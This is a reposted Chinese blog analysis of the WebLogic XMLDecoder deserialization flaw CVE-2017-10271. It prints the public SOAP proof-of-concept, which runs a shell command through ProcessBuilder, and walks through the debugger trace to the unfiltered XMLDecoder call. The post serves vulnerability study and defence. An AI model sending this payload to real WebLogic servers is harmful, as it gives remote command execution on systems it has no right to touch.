WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

最新推荐文章于 2024-08-13 18:32:25 发布
最新推荐文章于 2024-08-13 18:32:25 发布
阅读量270 收藏
点赞数
文章标签: java 区块链 开发工具
原文链接:https://yq.aliyun.com/articles/473511
版权

12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次攻击者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?

0. 分析环境

  • IDE:Intellij IDEA
  • 中间件版本: weblogic 10.3.6【未进行任何补丁修复】
  • 发包工具: brupsuite

1. 漏洞成因

我们先来看一下,网上公布的poc进行利用后的weblogic返回的响应,公布的利用poc如下:

<?xml version="1.0"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <java version="1.8.0_131" class="java.beans.XMLDecoder">
                <void class="java.lang.ProcessBuilder">
                    <array class="java.lang.String" length="3">
                        <void index="0">
                            <string>/bin/bash</string>
                        </void>
                        <void index="1">
                            <string>-c</string>
                        </void>
                        <void index="2">
                            <string>gedit</string>
                        </void>
                    </array>
                    <void method="start" />
                </void>
            </java>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body />
</soapenv:Envelope>

如下图所示,可以看到返回的是xml数据,而且可以清晰的看到调用栈,调用栈在<ns2:frame />标签中
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

仔细分析weblogic返回的响应,我们可以大概定位到问题点,我们重点关注<ns2:frame />标签中class以weblogic开头的部分,这部分就是weblogic处理我们请求的调用栈逻辑,weblogic处理完后就到了XMLDecoder
Step 1. 了解处理流程(为了方便查看,调用栈顺序为从上倒下)

  • weblogic.wsee.jaxws.workcontext.WorkContextServerTube->processRequest
  • weblogic.wsee.jaxws.workcontext.WorkContextTube->readHeaderOld
  • weblogic.wsee.jaxws.workcontext.WorkContextServerTube->receive
  • weblogic.workarea.WorkContextMapImpl->receiveRequest
  • weblogic.workarea.WorkContextLocalMap->receiveRequest
  • weblogic.workarea.spi.WorkContextEntryImpl->readEntry
  • weblogic.wsee.workarea.WorkContextXmlInputAdapter->readUTF

Step 2.下断点调试
我们将断点设置在weblogic.wsee.jaxws.workcontext.WorkContextServerTube的processRequest方法中readHeaderOld,如下图所示
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

Step 3.调试运行,跟踪

  1. processRequest中,var1为我们POST的xml数据,类型为Packet;
    WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

var3的值有是var2调用get方法后得来的,我们查看一下WorkAreaConstants.WORK_AREA_HEADER的内容,如下图所示
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

对比Poc内容与WorkAreaContants里面的XML_TAG、WORK_AREA_HEADER,我们不难联想到var2.get方法是用来获取work:WorkContext标签之间的内容。

2.readHeaderOld中,我们直接设置断点到weblogic调用栈最后一个函数WorkContextXmlInputAdapter,查看调用函数的参数值是什么?
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析
可以看到,var4其实对应的是java标签内的代码
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

3.WorkContextXmlInputAdapter中,没有任何过滤就直接调用XMLDecoder方法,而XMLDecoder本身是用于将XML文件反序列成java的对象,因而造成的漏洞的发生。
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)漏洞分析

归根结底,还是weblogic犯了编码上的错误,完全信任用户的输入,然后调用XMLDecoder进行反序列,导致了这个漏洞的发生。










本文转自 qq414207614 51CTO博客,原文链接:http://blog.51cto.com/skytina/2055335,如需转载请自行联系原作者
weixin_34138255
关注
WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)
做自己喜欢的事,并将其发挥到极致!
11-11 500
WebLogic是美国Oracle公司出品的一个 application server,确切的说是一个基于JAVAEE架构的中间件,Weblogic适用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。这里其实也就是weblogic中的WLS组件接收到SOAP格式的请求后,未对解析xml后的类,参数等进行处理,一系列传入最后执行了触发调用了类中的方法,产生漏洞
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271复现)
薛定谔嘚喵博客
05-07 774
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。漏洞触发url漏洞本质:主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令。
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
huangyongkang666的博客
07-25 1302
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271
漏洞复现】WebLogic XMLDecoder反序列化(CVE-2017-10271
m0_69043895的博客
04-25 771
前往Oracle官网下载10月份所提供的安全补丁:http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html升级过程可参考:http://blog.csdn.net/qqlifu/article/details/49423839。漏洞不仅仅存在与 /wls-wsat/CoordinatorPortType,只要是wls-wsat包中的Url皆收到影响,可以查看web.xml得知所受到影响的URl。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271"是针对这一特定漏洞的检测与防护解决方案。 首先,我们来理解什么是Java反序列化漏洞。在Java中,序列化是将对象的状态转化为...
CVE-2017-10271 WebLogic XMLDecoder反序列化漏洞
weixin_45694388的博客
07-09 5275
漏洞产生原因: CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。 涉及版本: 10.3.6.0.0 12.1.3.0.0 12.2.1.1.0 12.2.1.2.0 环境搭建: vulhub 工具利用: 检测: 工具weblogicScanner
Weblogic+XML反序列化漏洞检查工具CVE-2017-10271+V1.2
05-21
好用的Weblogic XML 反序列化漏洞检查工具 CVE-2017-10271 使用范围Oracle WebLogic Server 10.3.6.0.0版本 Oracle WebLogic Server 12.2.1.1.0版本 Oracle WebLogic Server 12.1.3.0.0版本
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其中CVE-2017-10271是一个著名的反序列化漏洞CVE-2017-10271漏洞源于Weblogic服务器中WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
Weblogic XMLDecoder 反序列化漏洞复现(CVE-2017-10271
DaWan
09-21 1233
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)环境搭建漏洞验证反弹shellPOC上传文件POC 环境搭建 使用vulhub进行环境搭建,具体步骤可参考这里。 启动成功 漏洞验证 访问http://IP:PORT/wls-wsat/CoordinatorPortType11,在挖洞的时候访问此地址出现如下页面则大概率都是存在这个漏洞的 反弹shellPOC POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: X.X.
java 反序列化漏洞 weblogic版本_WebLogic XMLDecoder反序列化漏洞CVE-2017-10271)漏洞分析...
weixin_29868343的博客
03-07 192
12月22号,绿盟科技博客发布一篇文章,里面有提及到weblogic由于存在0day漏洞,导致被植入恶意软件用来挖掘比特币。后来经过确认,这次***者所用的漏洞CVE编号为CVE-2017-10271,那么这个漏洞究竟是怎样造成的?0. 分析环境IDE:Intellij IDEA中间件版本: weblogic 10.3.6【未进行任何补丁修复】发包工具: brupsuite1. 漏洞成因我们先来看...
Weblogic XMLDecoder 反序列化漏洞
weixin_41438728的博客
11-12 240
Weblogic XMLDecoder 反序列化漏洞CVE-2017-10271)检测与利用复现 原理 Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 漏洞环境搭建 启动vulhub中的CVE-2017-10271 注意:复现过程基于同一台云主机,云主机内部靶场镜像开启CVE-2017-10271,文章内所有IP为同一个,请自行区分攻击方和受害方 漏洞检测 漏
Weblogic xmlDecoder反序列化漏洞
buffedon的博客
08-04 1881
Weblogic xmlDecoder反序列化漏洞Weblogic xmlDecoder漏洞分析CVE-2017-3506CVE-2017-10271环境搭建漏洞探测漏洞利用其他PoC Weblogic xmlDecoder CVE-2017-10271 影响版本 Weblogic < 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞CVE-2017-10271) Oracle WebLogic Server12.2.1.1 Oracle WebLogic Server12.2
WebLogic历史漏洞代码审计(二):WebLogic-XMLDecoder反序列化漏洞分析
最新发布
weixin_50600251的博客
08-13 1894
1、利用xml decoded反序列化进行远程代码执行的漏洞,例如:2、利用java反序列化进行远程代码执行的漏洞,例如:2018-2894本章主要讲CVE-2017-10271CVE-2017-3506的代码分析以上一篇文章搭建的CVE-2017-10271审计环境为例,我将CVE-2017-10271的利用链分为两部分第一部分利用链为WorkContextServerTube#processRequest到WorkContextXmlInputAdapter#readUTF。
WebLogic-XMLDecoder(CVE-2017-10271)反序列化漏洞分析及复现
人若无名,便可专心练剑
04-13 1677
下面的内容主要是给师傅们介绍和讲解下weblogic XMLDecoder漏洞,这个漏洞有很多个版本,有多个cve漏洞,这里我主要从基于IDEA和vulhun环境搭建来给师傅们复现下这个weblogic XMLDecoder漏洞。复现完成的师傅们,要是基础还可以,学过Java代码的可以尝试掌握下这个漏洞POC构造,这个是底层代码原理,比较难,小白的话把漏洞原理以及漏洞复现完成即可!!!
Weblogic XMLDecoder 反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
05-20 2762
本文介绍了Weblogic XMLDecoder反序列化相关的漏洞原理和poc的构造,并以CVE-2017-10271为例在vulhub上进行了复现。有关Weblogic XMLDecoder反序列化漏洞包括CVE-2017-3506、CVE-2017-10271CVE-2019-2725、CVE-2019-2729等,其漏洞原理相似,本文对此进行了简要介绍。
Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)
江小白
07-20 646
WebLogic XMLDecoder反序列化漏洞CVE-2017-10271漏洞编号:CVE-2017-10271 漏洞描述:WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,使用精心构造的xml数据可能造成任意代码执行,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限。。 受影响WebLogic版本:10.3.6.0.0,12.1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值